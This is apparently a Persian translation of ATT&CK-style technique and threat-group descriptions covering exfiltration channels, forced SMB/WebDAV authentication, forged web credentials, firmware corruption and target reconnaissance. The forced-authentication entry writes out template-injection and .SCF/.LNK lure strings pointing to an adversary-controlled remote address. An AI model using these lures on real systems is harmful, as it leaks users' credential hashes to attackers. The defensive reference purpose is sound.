دشمنان ممکن است داده ها را از طریق پروتکلی متفاوت از کانال فرمان و کنترل موجود، به سرقت ببرند. داده ها همچنین ممکن است از سرور اصلی فرمان و کنترل به یک مکان شبکه جایگزین ارسال شوند. پروتکل های جایگزین عبارتند از FTP، SMTP، HTTP/S، DNS، SMB، یا هر پروتکل شبکه دیگری که به عنوان کانال فرمان و کنترل اصلی استفاده نمی شود. کانال‌های پروتکل مختلف نیز می‌توانند شامل سرویس‌های وب مانند ذخیره‌سازی ابری باشند. همچنین ممکن است دشمنان این کانال‌های جایگزین را رمزگذاری و/یا مبهم کنند. Exfiltration Over Alternative Protocol را می توان با استفاده از ابزارهای رایج سیستم عامل مختلف مانند Net/SMB یا FTP انجام داد. در macOS و Linux curl ممکن است برای فراخوانی پروتکل‌هایی مانند HTTP/S یا FTP/S برای استخراج داده‌ها از یک سیستم استفاده شود.

دشمنان ممکن است داده ها را از طریق یک کانال فرمان و کنترل موجود به سرقت ببرند. داده های دزدیده شده با استفاده از همان پروتکل ارتباطات فرمان و کنترل در کانال ارتباطی معمولی کدگذاری می شوند.

دشمنان ممکن است سعی کنند داده ها را از طریق یک رسانه شبکه متفاوت از کانال فرمان و کنترل استخراج کنند. اگر شبکه فرمان و کنترل یک اتصال اینترنت سیمی باشد، دفع ممکن است به عنوان مثال از طریق اتصال WiFi، مودم، اتصال داده سلولی، بلوتوث یا کانال فرکانس رادیویی دیگر (RF) رخ دهد.اگر دشمنان دسترسی یا نزدیکی کافی داشته باشند، ممکن است این کار را انجام دهند، و ممکن است اتصال و همچنین کانال اصلی متصل به اینترنت ایمن یا محافظت نشود زیرا از طریق همان شبکه سازمانی هدایت نمی‌شود.

دشمنان ممکن است سعی کنند از طریق یک رسانه فیزیکی، مانند درایو قابل جابجایی، داده ها را استخراج کنند. در شرایط خاص، مانند به خطر افتادن شبکه با شکاف هوا، نفوذ ممکن است از طریق یک رسانه فیزیکی یا دستگاه معرفی شده توسط کاربر رخ دهد. چنین رسانه ای می تواند یک هارد دیسک خارجی، درایو USB، تلفن همراه، پخش کننده MP3 یا سایر دستگاه های ذخیره سازی و پردازش قابل جابجایی باشد. رسانه فیزیکی یا دستگاه می تواند به عنوان نقطه خروج نهایی یا برای پرش بین سیستم های جدا شده استفاده شود

دشمنان ممکن است از یک سرویس وب خارجی موجود و قانونی برای استخراج داده ها به جای کانال فرمان و کنترل اصلی خود استفاده کنند. سرویس‌های وب محبوب که به عنوان مکانیزم نفوذ عمل می‌کنند، ممکن است به دلیل احتمال اینکه میزبان‌های داخل یک شبکه از قبل با آن‌ها ارتباط برقرار کرده باشند، پوشش قابل توجهی ارائه می‌دهند.

Elderwood یک گروه مظنون به جاسوسی سایبری چینی است که گزارش شده است که مسئول نفوذ گوگل در سال 2009 به نام عملیات شفق قطبی بوده است. این گروه سازمان های دفاعی، تولیدکنندگان زنجیره تامین، سازمان های حقوق بشر و غیردولتی ( NGO) و ارائه دهندگان خدمات فناوری اطلاعات را هدف قرار داده است.

Equation یک گروه تهدید پیچیده است که از چندین ابزار دسترسی از راه دور استفاده می کند. این گروه به استفاده از اکسپلویت‌های روز صفر معروف است و قابلیت بازنویسی میان‌افزار درایوهای دیسک سخت را توسعه داده است.

Evilnum یک گروه تهدید با انگیزه مالی است که حداقل از سال 2018 فعال بوده است.

یک تعریف رایج استخراج داده، سرقت یا حذف یا جابجایی غیرمجاز هر داده از یک دستگاه است. استخراج داده ها معمولاً شامل سرقت اطلاعات از دستگاه های شخصی یا شرکتی مانند رایانه ها و تلفن های همراه از طریق روش های مختلف حمله سایبری توسط یک مجرم سایبری است.

حمله گنجاندن فایل برای فریب برنامه در معرض نمایش یا اجرای فایل‌ها در سرور استفاده می‌شود. این حملات معمولاً زمانی اتفاق می‌افتد که یک برنامه از مسیر یک فایل به عنوان ورودی استفاده می‌کند. اگر برنامه آن ورودی را قابل اعتماد تلقی کند، مهاجم می‌تواند از فایل محلی در یک عبارت شامل استفاده کند.

دشمنان ممکن است مجوزها/ ویژگی‌های فایل یا دایرکتوری را تغییر دهند تا از فهرست‌های کنترل دسترسی فرار کنند و به فایل‌های محافظت شده دسترسی پیدا کنند. مجوزهای فایل و دایرکتوری معمولاً توسط ACLهایی که توسط مالک فایل یا دایرکتوری پیکربندی شده اند یا کاربرانی با مجوزهای مناسب مدیریت می شوند. پیاده سازی فایل ها و دایرکتوری های ACL بر اساس پلتفرم متفاوت است، اما به طور کلی مشخص می کند که کدام کاربران یا گروه ها می توانند چه اقداماتی را انجام دهند (خواندن، نوشتن، اجرا و غیره). تغییرات ممکن است شامل تغییر حقوق دسترسی خاص باشد، که ممکن است نیاز به مالکیت یک فایل یا فهرست و/یا مجوزهای بالاتر بسته به مجوزهای موجود فایل یا فهرست داشته باشد. این ممکن است فعالیت های مخربی مانند اصلاح، جایگزینی یا حذف فایل ها یا دایرکتوری های خاص را فعال کند. اصلاحات خاص فایل و دایرکتوری ممکن است برای بسیاری از تکنیک‌ها یک مرحله ضروری باشد، مانند ایجاد Persistence از طریق ویژگی‌های دسترسی، اسکریپت‌های راه‌اندازی یا ورود به سیستم، اصلاح پیکربندی پوسته یونیکس، یا آلوده کردن/ربایش فایل‌های باینری/پیکربندی ابزاری دیگر از طریق Hijack Execution Flow.

دشمنان ممکن است با استناد یا وادار کردن کاربر به ارائه خودکار اطلاعات احراز هویت از طریق مکانیزمی که در آن می توانند رهگیری کنند، اطلاعات اعتبار جمع آوری کنند. پروتکل Server Message Block (SMB) معمولاً در شبکه های ویندوز برای احراز هویت و ارتباط بین سیستم ها برای دسترسی به منابع و اشتراک گذاری فایل استفاده می شود. هنگامی که یک سیستم ویندوز تلاش می کند به یک منبع SMB متصل شود، به طور خودکار تلاش می کند تا اطلاعات اعتبار کاربر فعلی را به سیستم راه دور تأیید و ارسال کند. این رفتار در محیط های سازمانی معمول است به طوری که کاربران نیازی به وارد کردن اعتبار برای دسترسی به منابع شبکه ندارند. نگارش و نسخه سازی توزیع شده وب ( WebDAV) نیز معمولاً توسط سیستم های ویندوز به عنوان یک پروتکل پشتیبان در زمانی که SMB مسدود شده یا از کار می افتد استفاده می شود. WebDAV توسعه HTTP است و معمولاً روی پورت های 80 و 443 TCP کار می کند. دشمنان ممکن است از این رفتار برای دسترسی به هش حساب کاربری از طریق احراز هویت اجباری SMB/WebDAV استفاده کنند. یک حریف می‌تواند پیوستی را از طریق spearphishing برای کاربر ارسال کند که حاوی پیوند منبع به سرور خارجی کنترل‌شده توسط دشمن است (یعنی تزریق الگو)، یا یک فایل ساخته‌شده خاص را در مسیر پیمایش حساب‌های دارای امتیاز قرار دهد (مثلاً فایل SCF. که روی دسک‌تاپ قرار می‌گیرد. ) یا روی اشتراکی که برای عموم قابل دسترسی است تا قربانی(ها) به آن دسترسی داشته باشند. هنگامی که سیستم کاربر به منبع نامعتبر دسترسی پیدا می کند، احراز هویت را انجام می دهد و اطلاعاتی از جمله اعتبار هش شده کاربر را از طریق SMB به سرور کنترل شده توسط دشمن ارسال می کند. با دسترسی به هش اعتبار، یک دشمن می‌تواند کرک کردن Brute Force را برای دسترسی به اعتبار متن ساده انجام دهد. چندین راه مختلف وجود دارد که ممکن است این اتفاق بیفتد. برخی از ویژگی های استفاده در طبیعت عبارتند از: یک پیوست spearphishing حاوی یک سند با منبعی که به طور خودکار هنگام باز شدن سند بارگیری می شود (به عنوان مثال تزریق الگو). این سند می‌تواند شامل درخواستی شبیه به: file[:]//[remote address]/Normal.dotm باشد تا درخواست SMB را فعال کند. یک فایل .LNK یا .SCFاصلاح شده با نام فایل نماد به یک مرجع خارجی مانند: \[remote address]\pic.png که سیستم را مجبور می‌کند منبع را بارگیری کند وقتی نماد برای جمع‌آوری مکرر اعتبارنامه‌ها ارائه می‌شود.

دشمنان ممکن است اطلاعات اعتباری را جعل کنند که می تواند برای دسترسی به برنامه های کاربردی وب یا خدمات اینترنتی استفاده شود. برنامه‌ها و سرویس‌های وب (مستقر شده در محیط‌های SaaS ابری یا سرورهای داخلی) اغلب از کوکی‌های جلسه، نشانه‌ها یا سایر مواد برای احراز هویت و مجوز دسترسی کاربر استفاده می‌کنند. دشمنان ممکن است این مواد اعتباری را برای دسترسی به منابع وب تولید کنند. این با Steal Web Session Cookie، Steal Application Access Token و سایر رفتارهای مشابه متفاوت است، زیرا اعتبارنامه ها جدید هستند و توسط دشمن جعل شده اند، به جای دزدیده شدن یا رهگیری از کاربران قانونی. تولید اعتبارهای وب اغلب به مقادیر مخفی مانند رمز عبور، کلیدهای خصوصی یا سایر مقادیر اولیه رمزنگاری نیاز دارد. پس از جعل، دشمنان ممکن است از این اعتبارنامه‌های وب برای دسترسی به منابع استفاده کنند (مثلاً از مواد احراز هویت جایگزین استفاده کنید)، که ممکن است مکانیسم‌های حفاظتی چندعاملی و دیگر احراز هویت را دور بزند.

دشمنان ممکن است فایل‌ها و دایرکتوری‌ها را شمارش کنند یا ممکن است در مکان‌های خاصی از اشتراک‌گذاری میزبان یا شبکه برای اطلاعات خاصی در یک سیستم فایل جستجو کنند. دشمنان ممکن است از اطلاعات File and Directory Discovery در طول کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده می کند و/یا اقدامات خاصی را انجام می دهد. برای به دست آوردن این اطلاعات می توان از بسیاری از ابزارهای پوسته فرمان استفاده کرد. مثالها عبارتند از dir، tree، ls، find و locate. همچنین ممکن است از ابزارهای سفارشی برای جمع آوری اطلاعات فایل و فهرست و تعامل با Native API استفاده شود.

اگر کانال اصلی در معرض خطر یا غیرقابل دسترسی باشد، ممکن است دشمنان از کانال‌های ارتباطی جایگزین یا جایگزین استفاده کنند تا فرمان و کنترل قابل اعتماد را حفظ کنند و از آستانه انتقال داده جلوگیری کنند.

دشمنان ممکن است محتویات حافظه فلش بایوس سیستم یا سایر سیستم عامل‌ها را در دستگاه‌های متصل به سیستم بازنویسی یا خراب کنند تا آنها را غیرقابل اجرا یا راه‌اندازی نکنند. سفت‌افزار نرم‌افزاری است که از حافظه غیرفرار روی دستگاه‌های سخت‌افزاری بارگذاری و اجرا می‌شود تا عملکرد دستگاه را مقداردهی اولیه و مدیریت کند. این دستگاه ها می توانند شامل مادربرد، هارد دیسک یا کارت گرافیک باشند.

Ferocious Kitten یک گروه تهدید است که عمدتاً از سال 2015، افراد فارسی زبان را در ایران هدف قرار داده است.

فاکس کیتن یک بازیگر تهدید با ارتباط مشکوک با دولت ایران است که حداقل از سال 2017 علیه نهادهایی در خاورمیانه، شمال آفریقا، اروپا، استرالیا و آمریکای شمالی فعال بوده است. Fox Kitten چندین بخش صنعتی از جمله نفت و گاز، فناوری، دولت، دفاع، مراقبت های بهداشتی، تولید و مهندسی را هدف قرار داده است.

فرانکشتاین کمپینی است که بین ژانویه و آوریل 2019 توسط عوامل تهدید ناشناس انجام شد. نام کمپین از توانایی بازیگران در کنار هم قرار دادن چندین مؤلفه نامرتبط می آید.

توضیح

توضیح

دشمنان ممکن است اطلاعاتی در مورد میزبان قربانی جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به میزبان ممکن است شامل جزئیات مختلفی از جمله داده‌های اداری (مانند: نام، IP اختصاصی، عملکرد و غیره) و همچنین مشخصات مربوط به پیکربندی آن (مانند: سیستم عامل، زبان و غیره) باشد. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند اقدامات مستقیم از طریق اسکن فعال یا فیشینگ برای اطلاعات، جمع‌آوری کنند. دشمنان همچنین ممکن است سایت‌ها را به خطر بیاندازند و سپس محتوای مخرب را طراحی کنند که برای جمع‌آوری اطلاعات میزبان از بازدیدکنندگان طراحی شده است. اطلاعات مربوط به میزبان نیز ممکن است به صورت آنلاین یا به وسیله سایر مجموعه داده‌های در دسترس (مانند: رسانه‌های اجتماعی یا جستجو در وب سایت‌های متعلق به قربانیان) در معرض مخالفان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب سایت‌ها/دامنه‌های باز یا جستجو در پایگاه های اطلاعاتی فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها) و/یا دسترسی اولیه (مانند: مصالحه زنجیره تامین) نشان دهد.

دشمنان ممکن است اطلاعاتی درباره سخت‌افزار میزبان قربانی جمع آوری کنند که می تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به زیرساخت های سخت افزاری ممکن است شامل انواع مختلفی از جزئیات مانند انواع و نسخه ها روی میزبان های خاص و همچنین وجود اجزای اضافی باشد که ممکن است نشان دهنده حفاظت های دفاعی اضافی باشد (به عنوان مثال: خوانندگان کارت/ بیومتریک، سخت افزار رمزگذاری اختصاصی و غیره). دشمنان ممکن است این اطلاعات را به طرق مختلف جمع آوری کنند، مانند اقدامات جمع‌آوری مستقیم از طریق اسکن فعال (به عنوان مثال: نام میزبان، بنر سرور، رشته نماینده کاربر) یا فیشینگ برای اطلاعات. دشمنان همچنین ممکن است سایت‌ها را به خطر بیاندازند و سپس محتوای مخرب را طراحی کنند که برای جمع آوری اطلاعات میزبان از بازدیدکنندگان طراحی شده است. اطلاعات مربوط به زیرساخت های سخت افزاری نیز ممکن است از طریق آنلاین یا سایر مجموعه های داده در دسترس (مانند: آگهی های شغل ، نقشه های شبکه ، گزارشهای ارزیابی ، رزومه یا فاکتورهای خرید) در معرض دید دشمنان قرار گیرد. جمع آوری این اطلاعات ممکن است فرصت هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب سایت‌ها/ دامنه‌های باز یا جستجو در پایگاه های اطلاعاتی فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت ها یا به دست آوردن قابلیت ها) و یا دسترسی اولیه (مانند: مصالحه برای تامین سخت افزار) نشان دهد.

دشمنان ممکن است اطلاعاتی در مورد نرم افزار میزبان قربانی جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به نرم افزار نصب شده ممکن است شامل انواع مختلفی از جزئیات مانند انواع و نسخه‌ها روی میزبان‌های خاص و همچنین وجود اجزای اضافی باشد که ممکن است نشان دهنده حفاظت دفاعی اضافی باشد (مانند: آنتی‌ویروس، SIEM و غیره). دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند اقدامات جمع‌آوری مستقیم از طریق اسکن فعال (مانند: پورت‌های صدا، بنرهای سرور، رشته‌های عامل کاربر) یا فیشینگ برای اطلاعات، جمع‌آوری کنند. دشمنان همچنین ممکن است سایت‌ها را به خطر بیاندازند و سپس محتوای مخرب را طراحی کنند که برای جمع‌آوری اطلاعات میزبان از بازدیدکنندگان طراحی شده است. اطلاعات مربوط به نرم افزار نصب شده نیز ممکن است از طریق آنلاین یا دیگر مجموعه داده‌های در دسترس (مانند: آگهی‌های کار، نقشه‌های شبکه، گزارش‌های ارزیابی، رزومه یا فاکتورهای خرید) در معرض دید دشمنان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب‌سایت‌ها/ دامنه‌های باز یا جستجو در پایگاه‌های فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها) و یا دسترسی اولیه (مانند: زنجیره تامین)

دشمنان ممکن است اطلاعاتی در مورد سیستم عامل میزبان قربانی جمع آوری کنند که می تواند در هنگام هدف گیری مورد استفاده قرار گیرد. اطلاعات مربوط به سیستم عامل میزبان ممکن است شامل انواع مختلفی از جزئیات مانند نوع و نسخه های مربوط به میزبان خاص باشد، که ممکن است برای استنباط اطلاعات بیشتر در مورد میزبان در محیط (مانند: پیکربندی، هدف، سن/ سطح وصله و غیره) استفاده شود. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند استخراج مستقیم از طریق فیشینگ برای اطلاعات، جمع آوری کنند. اطلاعات مربوط به سیستم عامل میزبان فقط از طریق آنلاین یا سایر مجموعه داده های قابل دسترسی (مانند: آگهی های شغل، نقشه های شبکه، گزارشهای ارزیابی، رزومه یا فاکتورهای خرید) در معرض دشمنی قرار می‌گیرد. جمع آوری این اطلاعات ممکن است فرصت هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب سایت ها / دامنه های باز یا جستجو در پایگاه های اطلاعات فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها) و یا دسترسی اولیه (مانند: مصالحه زنجیره تامین) نشان دهد.

دشمنان ممکن است اطلاعاتی در مورد تنظیمات مشتری قربانی جمع آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به پیکربندی کلاینت ممکن است شامل انواع جزئیات و تنظیمات باشد، از جمله سیستم عامل/نسخه، مجازی سازی، معماری (مانند: 32 یا 64 بیت) ، زبان و یا منطقه زمانی. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند اقدامات جمع آوری مستقیم از طریق اسکن فعال (مانند: پورت‌های صدا، بنرهای سرور، رشته‌های عامل کاربر) یا فیشینگ برای اطلاعات، جمع آوری کنند. دشمنان همچنین ممکن است سایت‌ها را به خطر بیاندازند و سپس محتوای مخرب را طراحی کنند که برای جمع آوری اطلاعات میزبان از بازدیدکنندگان طراحی شده است. اطلاعات مربوط به پیکربندی‌های سرویس گیرنده نیز ممکن است از طریق داده های آنلاین یا دیگر مجموعه های داده در دسترس دشمنان قرار گیرد (مانند: آگهی‌های شغلی‌، نقشه‌های شبکه، گزارش‌های ارزیابی، رزومه یا فاکتورهای خرید). جمع آوری این اطلاعات ممکن است فرصت هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب سایت‌ها/ دامنه های باز یا جستجو در پایگاه های اطلاعاتی فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها) و یا دسترسی اولیه (به عنوان مثال: سازش زنجیره تامین) نشان دهد.

دشمنان ممکن است اطلاعاتی در مورد هویت قربانی جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به هویت‌ها ممکن است شامل جزئیات مختلفی از جمله داده‌های شخصی (مانند: نام کارکنان، آدرس ایمیل و غیره) و همچنین جزئیات حساس مانند اعتبارنامه باشد. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند استخراج مستقیم از طریق فیشینگ جمع آوری کنند. اطلاعات مربوط به قربانیان همچنین ممکن است از طریق داده‌های آنلاین یا دیگر مجموعه‌های قابل دسترسی (مانند: رسانه‌های اجتماعی یا جستجو در وب سایت‌های متعلق به قربانیان) در معرض مخالفان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مانند: جستجو در وب سایت‌ها/دامنه‌های باز یا فیشینگ برای اطلاعات) ، ایجاد منابع عملیاتی (به عنوان مثال: حساب‌های سازش) و/یا دسترسی اولیه (مانند: فیشینگ یا حساب‌های معتبر) نشان دهد.

دشمنان ممکن است اعتبارنامه‌هایی را جمع آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اعتبارنامه‌های حساب جمع آوری شده توسط دشمنان ممکن است مستقیماً با سازمان قربانی هدف مرتبط باشد یا سعی کنند از تمایل کاربران برای استفاده از رمزهای عبور یکسان در حساب‌های شخصی و تجاری استفاده کنند. دشمنان ممکن است اعتبارهای قربانیان احتمالی را به روش‌های مختلف، مانند درخواست مستقیم از طریق فیشینگ برای اطلاعات، جمع‌آوری کنند. دشمنان همچنین ممکن است سایت‌ها را به خطر بیاندازند و سپس محتوای مخرب را طراحی کنند که برای جمع آوری کوکی‌های احراز هویت وب سایت از بازدیدکنندگان طراحی شده است. اطلاعات معتبر همچنین ممکن است از طریق نشت به مجموعه داده‌های آنلاین یا دیگر داده‌های در دسترس (مانند: موتورهای جستجو، پایگاه‌های تخلف، مخازن کد و غیره) در معرض دشمنی قرار گیرد. دشمنان همچنین می‌توانند از dark webیا دیگر بازارهای سیاه اعتبارنامه خریداری کنند. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب‌سایت‌ها/ دامنه‌های باز یا فیشینگ برای اطلاعات) ، ایجاد منابع عملیاتی (مانند: حساب‌های سازش) و یا دسترسی اولیه (به عنوان مثال: خدمات از راه دور خارجی یا حسابهای معتبر) نشان دهد.

دشمنان ممکن است آدرس های ایمیل را جمع آوری کنند که می تواند در هنگام هدف گیری مورد استفاده قرار گیرد. حتی اگر نمونه‌های داخلی وجود داشته باشد، ممکن است سازمان‌ها زیرساخت ایمیل و آدرس کارکنان را در اختیار عموم قرار دهند. دشمنان ممکن است به راحتی آدرس‌های ایمیل را جمع آوری کنند، زیرا ممکن است به آسانی در دسترس باشند و از طریق مجموعه داده‌های آنلاین یا دیگر مجموعه‌های در دسترس (مانند: رسانه‌های اجتماعی یا جستجو در وب سایت‌های متعلق به قربانیان) در معرض دید قرار گیرند. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مانند: جستجو در وب سایت‌ها/دامنه‌های باز یا فیشینگ برای اطلاعات) ، ایجاد منابع عملیاتی (مانند: حساب های ایمیل) و یا دسترسی اولیه (مانند: فیشینگ) نشان دهد.

دشمنان ممکن است نام کارکنان را جمع آوری کنند که می‌تواند در هنگام هدف گیری استفاده شود. نام کارکنان برای استخراج آدرس‌های ایمیل و همچنین راهنمایی سایر تلاش‌های شناسایی و یا ایجاد وسوسه‌های باورنکردنی استفاده می شود. دشمنان ممکن است به راحتی اسامی کارکنان را جمع آوری کنند، زیرا ممکن است به آسانی در دسترس باشند و از طریق داده‌های آنلاین یا دیگر مجموعه‌های قابل دسترسی (مانند: رسانه‌های اجتماعی یا جستجو در وب سایت‌های متعلق به قربانیان) در دسترس قرار گیرند. جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب سایت‌ها/ دامنه‌های باز یا فیشینگ برای اطلاعات) ، ایجاد منابع عملیاتی (مانند: حساب‌های سازش) و یا دسترسی اولیه (مانند: فیشینگ یا حساب‌های معتبر) نشان دهد.

دشمنان ممکن است اطلاعاتی در مورد شبکه‌های قربانی جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به شبکه‌ها ممکن است شامل جزئیات مختلفی از جمله داده‌های اداری (مانند: محدوده IP، نام دامنه و...) و همچنین مشخصات مربوط به توپولوژی و عملکرد آن باشد. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند اقدامات مستقیم از طریق اسکن فعال یا فیشینگ جمع‌آوری کنند. اطلاعات مربوط به شبکه‌ها نیز ممکن است از طریق مجموعه‌های داده آنلاین یا دیگر داد‌ه‌های در دسترس دشمنان قرار گیرد (به عنوان مثال: جستجو در پایگاه‌های فنی باز). جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: اسکن فعال یا جستجوی وب سایت‌ها/دامنه‌های باز) ، ایجاد منابع عملیاتی (مانند: به دست آوردن زیرساخت یا زیرساخت سازش) و/یا دسترسی اولیه (مانند: رابطه مورد اعتماد) نشان دهد.

دشمنان ممکن است اطلاعاتی در مورد دامنه‌ (های) شبکه قربانی جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به دامنه‌ها و ویژگی‌های آنها ممکن است شامل جزئیات مختلفی باشد، از جمله دامنه (های) قربانی و همچنین اطلاعات اداری (مانند: نام، ثبت کننده و غیره) و اطلاعات مستقیم تر مانند مخاطبین (آدرس ایمیل و تلفن) شماره) ، آدرس‌های تجاری و سرورهای نام. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند اقدامات مستقیم جمع آوری از طریق اسکن فعال یا فیشینگ برای اطلاعات، جمع‌آوری کنند. اطلاعات مربوط به حوزه های قربانی و ویژگی های آنها نیز ممکن است از طریق مجموعه های داده آنلاین یا دیگر داده های موجود (مانند: (WHOIS) در معرض دید دشمنان قرار گیرد. جمع آوری این اطلاعات ممکن است فرصت هایی برای سایر اشکال شناسایی (به عنوان مثال: جستجو در پایگاه های اطلاعات فنی باز ، جستجو در وب سایت ها/دامنه های باز ، یا فیشینگ برای اطلاعات) ، ایجاد منابع عملیاتی (به عنوان مثال: به دست آوردن زیرساخت یا سازش زیرساخت ها) و/یا دسترسی اولیه

دشمنان ممکن است اطلاعاتی در مورد DNS قربانی جمع آوری کنند که می تواند در هنگام هدف گیری مورد استفاده قرار گیرد. اطلاعات DNS ممکن است شامل جزئیات مختلفی باشد، از جمله سرورهای نام ثبت شده و همچنین پرونده‌هایی که آدرس زیر دامنه های هدف، سرورهای ایمیل و سایر میزبان ها را مشخص می کند. دشمنان ممکن است این اطلاعات را به روش های مختلف جمع آوری کنند، مانند پرس و جو یا جمع آوری جزئیات از طریق DNS/Passive DNS اطلاعات DNS همچنین ممکن است از طریق مجموعه های داده آنلاین یا دیگر داده های در دسترس در برابر دشمنان قرار گیرد (به عنوان مثال: جستجو در پایگاه‌های اطلاعات فنی باز). جمع آوری این اطلاعات ممکن است فرصت هایی را برای سایر اشکال شناسایی (مانند: جستجو در پایگاه های اطلاعات فنی باز ، جستجو در وب سایت ها/دامنه های باز ، یا اسکن فعال) ، ایجاد منابع عملیاتی (به عنوان مثال: به دست آوردن زیرساخت یا سازش زیرساخت ها) و یا دسترسی اولیه (سابق : خدمات از راه دور خارجی).

دشمنان ممکن است اطلاعاتی در مورد وابستگی های اعتماد شبکه قربانی جمع آوری کنند که می تواند در هنگام هدف گیری مورد استفاده قرار گیرد. اطلاعات مربوط به امانت‌های شبکه ممکن است شامل جزئیات مختلفی باشد، از جمله سازمان‌ها یا دامنه های شخص ثالث (مانند: ارائه دهندگان خدمات مدیریت شده، پیمانکاران و غیره) که دسترسی به شبکه را متصل کرده اند (و به طور بالقوه افزایش داده است). دشمنان ممکن است این اطلاعات را به روش های مختلف، مانند استخراج مستقیم از طریق فیشینگ برای اطلاعات، جمع آوری کنند. اطلاعات مربوط به امانت‌های شبکه نیز ممکن است از طریق آنلاین یا دیگر مجموعه داده های قابل دسترسی در معرض دشمنی قرار گیرد (به عنوان مثال: جستجو در پایگاه های اطلاعات فنی باز). جمع آوری این اطلاعات ممکن است فرصت هایی را برای سایر اشکال شناسایی (مانند: اسکن فعال یا جستجوی وب سایت ها/دامنه های باز) ، ایجاد منابع عملیاتی (به عنوان مثال: به دست آوردن زیرساخت یا زیرساخت سازش) و یا دسترسی اولیه (مانند: رابطه مورد اعتماد) نشان دهد.

دشمنان ممکن است اطلاعاتی در مورد توپولوژی شبکه قربانی جمع آوری کنند که می‌تواند در هنگام هدف گیری مورد استفاده قرار گیرد. اطلاعات مربوط به توپولوژی‌های شبکه ممکن است شامل جزئیات مختلفی از جمله ترتیب فیزیکی و یا منطقی محیط‌های شبکه خارجی و داخلی باشد. این اطلاعات همچنین ممکن است شامل مشخصات مربوط به دستگاه‌های شبکه (دروازه‌ها، روترها و غیره) و سایر زیرساخت ها باشد. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند اقدامات مستقیم جمع آوری از طریق اسکن فعال یا فیشینگ برای اطلاعات، جمع‌آوری کنند. اطلاعات مربوط به توپولوژی‌های شبکه نیز ممکن است از طریق آنلاین یا سایر مجموعه‌های داده در دسترس (مثلاً: وب سایت‌های متعلق به قربانی جستجو) در معرض دشمنان قرار گیرد. جمع‌آوری این اطلاعات ممکن است فرصت هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در پایگاه داده های فنی باز یا جستجو در وب سایت ها/دامنه های باز) ، ایجاد منابع عملیاتی (به عنوان مثال: به دست آوردن زیرساخت یا زیرساخت سازش) و/یا دسترسی اولیه (مانند: خدمات از راه دور خارجی) نشان دهد. )

دشمنان ممکن است آدرسIP قربانی را جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. آدرس‌هایIP عمومی ممکن است به صورت بلوک یا طیف وسیعی از آدرس‌های متوالی به سازمان‌ها اختصاص داده شود. اطلاعات مربوط به آدرس‌هایIP اختصاص داده شده ممکن است شامل جزئیات مختلفی باشد، مانند آدرس‌هایIP مورد استفاده. آدرس‌هایIP همچنین ممکن است به دشمن این امکان را بدهد که اطلاعات دیگری در مورد قربانی مانند اندازه سازمان، مکان (های) فیزیکی، ارائه دهنده خدمات اینترنت و یا محل چگونگی میزبانی زیرساخت‌های عمومی آنها بدست آورد. دشمنان ممکن است این اطلاعات را به روش‌های مختلف، مانند اقدامات مستقیم جمع‌آوری از طریق اسکن فعال یا فیشینگ برای اطلاعات، جمع‌آوری کنند. اطلاعات مربوط به آدرس‌های IP اختصاص داده شده نیز ممکن است از طریق آنلاین یا سایر مجموعه‌های داده در دسترس دشمنان قرار گیرد (به عنوان مثال: جستجو در پایگاه‌های فنی باز). جمع‌آوری این اطلاعات ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً: پویش فعال یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی (مثلاً: زیرساخت‌های زیرساخت یا سازش) و/یا دسترسی اولیه (مثلاً: خدمات از راه دور خارجی) را نشان دهد.

